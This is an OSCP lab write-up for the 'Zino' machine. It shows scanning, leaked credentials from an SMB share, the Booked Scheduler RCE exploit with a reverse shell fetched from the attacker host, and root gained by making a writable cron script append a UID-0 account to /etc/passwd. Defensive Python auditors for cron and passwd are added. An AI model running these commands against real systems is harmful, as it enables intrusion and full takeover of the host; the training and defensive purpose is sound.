OSCP lab – Zino
Key points (CVE-2019-9581 RCE + privilege escalation via a writable cron-job script)
1. nmap scan
┌──(root㉿kali)-[~/Desktop]
└─# nmap 192.168.173.64 -sV -sC -Pn --min-rate 2500 -p-
Starting Nmap 7.92 ( https://nmap.org ) at 2024-04-10 04:18 EDT
Nmap scan report for 192.168.173.64
Host is up (0.23s latency).
Not shown: 65529 filtered tcp ports (no-response)
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 3.0.3
22/tcp open ssh OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey:
| 2048 b2:66:75:50:1b:18:f5:e9:9f:db:2c:d4:e3:95:7a:44 (RSA)
| 256 91:2d:26:f1:ba:af:d1:8b:69:8f:81:4a:32:af:9c:77 (ECDSA)
|_ 256 ec:6f:df:8b:ce:19:13:8a:52:57:3e:72:a3:14:6f:40 (ED25519)
139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp open netbios-ssn Samba smbd 4.9.5-Debian (workgroup: WORKGROUP)
3306/tcp open mysql?
| fingerprint-strings:
| DNSStatusRequestTCP, HTTPOptions, JavaRMI, NULL, giop:
|_ Host '192.168.45.250' is not allowed to connect to this MariaDB server
|_ssl-date: ERROR: Script execution failed (use -d to debug)
|_tls-alpn: ERROR: Script execution failed (use -d to debug)
|_tls-nextprotoneg: ERROR: Script execution failed (use -d to debug)
|_ssl-cert: ERROR: Script execution failed (use -d to debug)
8003/tcp open http Apache httpd 2.4.38
|_http-title: Index of /
| http-ls: Volume /
| SIZE TIME FILENAME
| - 2019-02-05 21:02 booked/
|_
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port3306-TCP:V=7.92%I=7%D=4/10%Time=66164BB0%P=x86_64-pc-linux-gnu%r(NU
SF:LL,4D,"I\0\0\x01\xffj\x04Host\x20'192\.168\.45\.250'\x20is\x20not\x20al
SF:lowed\x20to\x20connect\x20to\x20this\x20MariaDB\x20server")%r(HTTPOptio
SF:ns,4D,"I\0\0\x01\xffj\x04Host\x20'192\.168\.45\.250'\x20is\x20not\x20al
SF:lowed\x20to\x20connect\x20to\x20this\x20MariaDB\x20server")%r(DNSStatus
SF:RequestTCP,4D,"I\0\0\x01\xffj\x04Host\x20'192\.168\.45\.250'\x20is\x20n
SF:ot\x20allowed\x20to\x20connect\x20to\x20this\x20MariaDB\x20server")%r(J
SF:avaRMI,4D,"I\0\0\x01\xffj\x04Host\x20'192\.168\.45\.250'\x20is\x20not\x
SF:20allowed\x20to\x20connect\x20to\x20this\x20MariaDB\x20server")%r(giop,
SF:4D,"I\0\0\x01\xffj\x04Host\x20'192\.168\.45\.250'\x20is\x20not\x20allow
SF:ed\x20to\x20connect\x20to\x20this\x20MariaDB\x20server");
Service Info: Hosts: ZINO, 127.0.1.1; OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

Host script results:
|_clock-skew: mean: 1h20m00s, deviation: 2h18m36s, median: 0s
| smb2-security-mode:
| 3.1.1:
|_ Message signing enabled but not required
| smb2-time:
| date: 2024-04-10T08:20:16
|_ start_date: N/A
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
| smb-os-discovery:
| OS: Windows 6.1 (Samba 4.9.5-Debian)
| Computer name: zino
| NetBIOS computer name: ZINO\x00
| Domain name: \x00
| FQDN: zino
|_ System time: 2024-04-10T04:20:18-04:00

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 140.16 seconds
2. user priv
┌──(root㉿kali)-[~/Desktop]
└─# smbmap -H 192.168.173.64 -u guest -p ""
[+] Guest session   	IP: 192.168.173.64:445	Name: 192.168.173.64
        Disk                                                  	Permissions	Comment
	----                                                  	-----------	-------
	zino                                              	READ ONLY	Logs
	print$                                            	NO ACCESS	Printer Drivers
	IPC$                                              	NO ACCESS	IPC Service (Samba 4.9.5-Debian)
Download the files and check them for sensitive information:
┌──(root㉿kali)-[~/Desktop/1]
└─# smbclient -N //192.168.173.64/zino/
smb: \> ls
  .                                   D        0  Thu Jul  9 15:11:49 2020
  ..                                  D        0  Tue Apr 28 09:38:53 2020
  .bash_history                       H        0  Tue Apr 28 11:35:28 2020
  error.log                           N      265  Tue Apr 28 10:07:32 2020
  .bash_logout                        H      220  Tue Apr 28 09:38:53 2020
  local.txt                           N       33  Wed Apr 10 04:18:07 2024
  .bashrc                             H     3526  Tue Apr 28 09:38:53 2020
  .gnupg                             DH        0  Tue Apr 28 10:17:02 2020
  .profile                            H      807  Tue Apr 28 09:38:53 2020
  misc.log                            N      424  Tue Apr 28 10:08:15 2020
  auth.log                            N      368  Tue Apr 28 10:07:54 2020
  access.log                          N     5464  Tue Apr 28 10:07:09 2020
  ftp                                 D        0  Tue Apr 28 10:12:56 2020

		7158264 blocks of size 1024. 4726348 blocks available
smb: \> mget *
misc.log contains:
Apr 28 08:39:01 zino systemd[1]: Set application username "admin"
Apr 28 08:39:01 zino systemd[1]: Set application password "adminadmin"
auth.log:
Apr 28 08:16:54 zino groupadd[1044]: new group: name=peter, GID=1001
Apr 28 08:16:54 zino useradd[1048]: new user: name=peter, UID=1001, GID=1001, home=/home/peter, shell=/bin/bash
Apr 28 08:17:01 zino passwd[1056]: pam_unix(passwd:chauthtok): password changed for peter
Login with admin:adminadmin succeeds:
http://192.168.173.64:8003/booked/Web/dashboard.php
┌──(root㉿kali)-[~/Desktop]
└─# searchsploit Booked scheduler
------------------------------------------------------------------------- ---------------------------------
 Exploit Title                                                           |  Path
------------------------------------------------------------------------- ---------------------------------
Booked Scheduler 2.7.5 - Remote Command Execution (Metasploit)           | php/webapps/46486.rb
Booked Scheduler 2.7.5 - Remote Command Execution (RCE) (Authenticated)  | php/webapps/50594.py
Booked Scheduler 2.7.7 - Authenticated Directory Traversal               | php/webapps/48428.txt
------------------------------------------------------------------------- ---------------------------------
Shellcodes: No Results
Papers: No Results

┌──(root㉿kali)-[~/Desktop]
└─# searchsploit -m php/webapps/50594.py
  Exploit: Booked Scheduler 2.7.5 - Remote Command Execution (RCE) (Authenticated)
      URL: https://www.exploit-db.com/exploits/50594
     Path: /usr/share/exploitdb/exploits/php/webapps/50594.py
    Codes: CVE-2019-9581
 Verified: False
File Type: Python script, ASCII text executable
Copied to: /root/Desktop/50594.py
Reverse shell: the target cannot make outbound connections to port 80, so the web server is started on port 21 instead:
┌──(root㉿kali)-[~/Desktop]
└─# python -m http.server 21
Serving HTTP on 0.0.0.0 port 21 (http://0.0.0.0:21/) ...
192.168.173.64 - - [10/Apr/2024 05:08:51] "GET /lrshell.php HTTP/1.1" 200 -

┌──(root㉿kali)-[~/Desktop]
└─# python 50594.py http://192.168.173.64:8003 admin adminadmin
[+] Logged in successfully.
[+] Uploaded shell successfully
[+] http://192.168.173.64:8003/booked/Web/custom-favicon.php?cmd=
$ pwd
/var/www/html/booked/Web
$ wget http://192.168.45.250:21/lrshell.php

Browser: open http://192.168.173.64:8003/booked/Web/lrshell.php to trigger the reverse shell.

webshell: http://pentestmonkey.net/tools/php-reverse-shell
┌──(root㉿kali)-[~/Desktop]
└─# nc -lvvp 22
listening on [any] 22 ...
192.168.173.64: inverse host lookup failed: Unknown host
connect to [192.168.45.250] from (UNKNOWN) [192.168.173.64] 35904
Linux zino 4.19.0-8-amd64 #1 SMP Debian 4.19.98-1 (2020-01-26) x86_64 GNU/Linux
 05:09:09 up 53 min,  0 users,  load average: 0.00, 0.00, 0.00
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned off
$ whoami
www-data

Upgrade the shell:
┌──(root㉿kali)-[~/Desktop]
└─# nc -lvvp 22
listening on [any] 22 ...
192.168.173.64: inverse host lookup failed: Unknown host
connect to [192.168.45.250] from (UNKNOWN) [192.168.173.64] 35946
Linux zino 4.19.0-8-amd64 #1 SMP Debian 4.19.98-1 (2020-01-26) x86_64 GNU/Linux
 05:19:44 up  1:04,  0 users,  load average: 0.00, 0.00, 0.00
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned off
$ python3 -c 'import pty;pty.spawn("/bin/bash")'; export TERM=xterm-256color
www-data@zino:/$ ^Z
zsh: suspended  nc -lvvp 22

┌──(root㉿kali)-[~/Desktop]
└─# stty raw -echo;fg
[1]  + continued  nc -lvvp 22
www-data@zino:/var/www$ cat /etc/passwd | grep -v nologin
root:x:0:0:root:/root:/bin/bash
sync:x:4:65534:sync:/bin:/bin/sync
peter:x:1000:1000:peter,,,:/home/peter:/bin/bash
mysql:x:106:113:MySQL Server,,,:/nonexistent:/bin/false

3. root priv
/etc/crontab:
SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin

17 * * * * root cd / && run-parts --report /etc/cron.hourly
25 6 * * * root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.daily )
47 6 * * 7 root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.weekly )
52 6 1 * * root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.monthly )
*/3 * * * * root python /var/www/html/booked/cleanup.py
The cron-job script is writable by www-data:
www-data@zino:/tmp$ ls -al /var/www/html/booked/cleanup.py
-rwxrwxrwx 1 www-data www-data 164 Apr 28 2020 /var/www/html/booked/cleanup.py
www-data@zino:/tmp$ cat /var/www/html/booked/cleanup.py
#!/usr/bin/env python
import os
import sys
try:os.system('rm -r /var/www/html/booked/uploads/reservation/* ')
except:print 'ERROR...'
sys.exit(0)
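A script that root runs every three minutes but that www-data can overwrite is the whole privilege-escalation path here, and it is something a host audit can catch before an attacker does. The following Python check is an added example, not part of the original writeup: it parses a system-crontab text, pulls out the absolute paths each job touches, and flags any that are group- or world-writable, owned by a non-root user although root runs them, or located in a world-writable directory. The crontab text and the temporary files built in demo() are constructed to mirror the -rwxrwxrwx cleanup.py shown above.

```python
import os
import stat
import tempfile

# Constructed sample modelled on the system crontab shown above
# (format: minute hour day-of-month month day-of-week USER command).
SAMPLE_CRONTAB = """\
SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin

17 * * * * root cd / && run-parts --report /etc/cron.hourly
*/3 * * * * root python /var/www/html/booked/cleanup.py
"""


def parse_system_crontab(text):
    """Return (user, command) for every job line of a system crontab.
    Blank lines, comments and VAR=value assignments are skipped."""
    jobs = []
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#") or "=" in line.split()[0]:
            continue
        if line.startswith("@"):                 # @daily user command
            fields = line.split(None, 2)
            if len(fields) == 3:
                jobs.append((fields[1], fields[2]))
            continue
        fields = line.split(None, 6)             # 5 time fields, user, command
        if len(fields) == 7:
            jobs.append((fields[5], fields[6]))
    return jobs


def absolute_paths(command):
    """Absolute path tokens referenced by a command string (a heuristic:
    shell operators are treated as separators, quoting is not parsed)."""
    flat = command.replace("&&", " ").replace("||", " ").replace(";", " ")
    return [tok for tok in flat.split() if tok.startswith("/")]


def audit_path(path, job_user):
    """Findings for one path a cron job touches: writable by group or others,
    owned by a non-root user although root runs it, or parent directory
    world-writable without the sticky bit (file can be swapped out)."""
    findings = []
    try:
        st = os.stat(path)
    except FileNotFoundError:
        return findings
    shown = stat.filemode(st.st_mode)
    if st.st_mode & stat.S_IWOTH:
        findings.append(f"{path}: world-writable ({shown})")
    if st.st_mode & stat.S_IWGRP:
        findings.append(f"{path}: group-writable ({shown})")
    if job_user == "root" and st.st_uid != 0:
        findings.append(f"{path}: owned by uid {st.st_uid} but executed by root")
    parent = os.path.dirname(path) or "/"
    pst = os.stat(parent)
    if pst.st_mode & stat.S_IWOTH and not pst.st_mode & stat.S_ISVTX:
        findings.append(f"{parent}: world-writable directory, file can be replaced")
    return findings


def audit_crontab(text):
    """Audit every absolute path referenced by every job in a crontab text."""
    findings = []
    for user, command in parse_system_crontab(text):
        for path in absolute_paths(command):
            findings.extend(audit_path(path, user))
    return findings


def demo():
    """Recreate the situation from the writeup in a throwaway directory:
    one -rwxrwxrwx script (bad) and one 0755 script (fine), both run by root."""
    tmp = tempfile.mkdtemp()
    bad = os.path.join(tmp, "cleanup.py")
    good = os.path.join(tmp, "rotate.py")
    for p in (bad, good):
        with open(p, "w") as fh:
            fh.write("#!/usr/bin/env python\n")
    os.chmod(bad, 0o777)     # what `ls -al cleanup.py` showed on the target
    os.chmod(good, 0o755)
    crontab = SAMPLE_CRONTAB.replace("/var/www/html/booked/cleanup.py", bad)
    crontab += f"*/5 * * * * root python {good}\n"
    return bad, good, audit_crontab(crontab)


if __name__ == "__main__":
    for finding in demo()[2]:
        print(finding)
```

On a real host, feed audit_crontab() the contents of /etc/crontab and each file under /etc/cron.d; the fix for a finding like the one above is to make the script root-owned and 0755 (or 0700) and to keep it outside the web root, where the web server account has no business writing.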
Generate a password hash for the new account:
┌──(root㉿kali)-[~/Desktop]
└─# openssl passwd pass@123
$1$0u9R34Oq$BL8AGWccOv95x6nX2A2bT1

Append it to /etc/passwd:
echo 'root1:$1$0u9R34Oq$BL8AGWccOv95x6nX2A2bT1:0:0:root1:/root:/bin/bash' >> /etc/passwd

Modified script:
#!/usr/bin/env python
import os
import sys
try:os.system("echo 'root1:$1$0u9R34Oq$BL8AGWccOv95x6nX2A2bT1:0:0:root1:/root:/bin/bash' >> /etc/passwd")
except:print 'ERROR...'
sys.exit(0)
www-data@zino:/tmp$ wget http://192.168.45.250:21/1.txt
--2024-04-10 05:33:20--  http://192.168.45.250:21/1.txt
Connecting to 192.168.45.250:21... connected.
HTTP request sent, awaiting response... 200 OK
Length: 203 [text/plain]
Saving to: ‘1.txt’

1.txt               100%[===================>]     203  --.-KB/s    in 0s

2024-04-10 05:33:21 (3.10 MB/s) - ‘1.txt’ saved [203/203]

www-data@zino:/tmp$ cat 1.txt > /var/www/html/booked/cleanup.py
www-data@zino:/tmp$ cat /var/www/html/booked/cleanup.py
#!/usr/bin/env python
import os
import sys
try:os.system("echo 'root1:$1$0u9R34Oq$BL8AGWccOv95x6nX2A2bT1:0:0:root1:/root:/bin/bash' >> /etc/passwd")
except:print 'ERROR...'
sys.exit(0)
www-data@zino:/tmp$ cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
_apt:x:100:65534::/nonexistent:/usr/sbin/nologin
systemd-timesync:x:101:102:systemd Time Synchronization,,,:/run/systemd:/usr/sbin/nologin
systemd-network:x:102:103:systemd Network Management,,,:/run/systemd:/usr/sbin/nologin
systemd-resolve:x:103:104:systemd Resolver,,,:/run/systemd:/usr/sbin/nologin
messagebus:x:104:110::/nonexistent:/usr/sbin/nologin
sshd:x:105:65534::/run/sshd:/usr/sbin/nologin
peter:x:1000:1000:peter,,,:/home/peter:/bin/bash
systemd-coredump:x:999:999:systemd Core Dumper:/:/usr/sbin/nologin
mysql:x:106:113:MySQL Server,,,:/nonexistent:/bin/false
ftp:x:107:116:ftp daemon,,,:/srv/ftp:/usr/sbin/nologin
root1:$1$0u9R34Oq$BL8AGWccOv95x6nX2A2bT1:0:0:root1:/root:/bin/bash
www-data@zino:/tmp$ su root1
Password:
root@zino:/tmp# id
uid=0(root) gid=0(root) groups=0(root)
root@zino:/tmp#
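The root1 line appended to /etc/passwd is a classic persistence artefact: a second UID-0 account whose hash sits in the world-readable passwd file rather than in /etc/shadow. As an added example that is not from the original writeup, this Python check parses passwd(5)-format lines and reports extra UID-0 accounts, hashes stored in /etc/passwd, empty password fields and shared UIDs; the sample text is constructed from entries in the listing above.

```python
# Constructed sample: a few entries from the /etc/passwd listing above,
# including the appended root1 account.
PASSWD_SAMPLE = """\
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
peter:x:1000:1000:peter,,,:/home/peter:/bin/bash
root1:$1$0u9R34Oq$BL8AGWccOv95x6nX2A2bT1:0:0:root1:/root:/bin/bash
"""

# Password-field values that mean "consult /etc/shadow" or "account locked".
SHADOWED = {"x", "*", "!", "!!"}


def parse_passwd(text):
    """Parse passwd(5) lines into dicts; a line without 7 fields is an error."""
    entries = []
    for line in text.splitlines():
        if not line.strip() or line.startswith("#"):
            continue
        parts = line.split(":")
        if len(parts) != 7:
            raise ValueError(f"malformed passwd line: {line!r}")
        name, pw, uid, gid, gecos, home, shell = parts
        entries.append({"name": name, "pw": pw, "uid": int(uid), "gid": int(gid),
                        "gecos": gecos, "home": home, "shell": shell})
    return entries


def audit_passwd(text):
    """Return human-readable findings for the patterns seen in the writeup:
    a second UID-0 user, a hash kept in /etc/passwd, an empty password, and
    UIDs shared by more than one account."""
    findings = []
    by_uid = {}
    for e in parse_passwd(text):
        by_uid.setdefault(e["uid"], []).append(e["name"])
        if e["uid"] == 0 and e["name"] != "root":
            findings.append(f"{e['name']}: extra UID-0 account")
        if e["pw"] == "":
            findings.append(f"{e['name']}: empty password field (no password needed)")
        elif e["pw"] not in SHADOWED:
            findings.append(f"{e['name']}: password hash stored in /etc/passwd instead of /etc/shadow")
    for uid, names in sorted(by_uid.items()):
        if len(names) > 1:
            findings.append(f"uid {uid} shared by {', '.join(names)}")
    return findings


def audit_passwd_file(path="/etc/passwd"):
    """Audit a real passwd file; run periodically, this would have flagged the
    root1 line the moment the cron job appended it."""
    with open(path, encoding="utf-8") as fh:
        return audit_passwd(fh.read())


if __name__ == "__main__":
    for finding in audit_passwd(PASSWD_SAMPLE):
        print(finding)
```

Pair this with file-integrity monitoring on /etc/passwd and /etc/shadow (or a simple baseline hash compared on each run); the check above tells you what changed, the integrity monitor tells you when.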
4. Summary: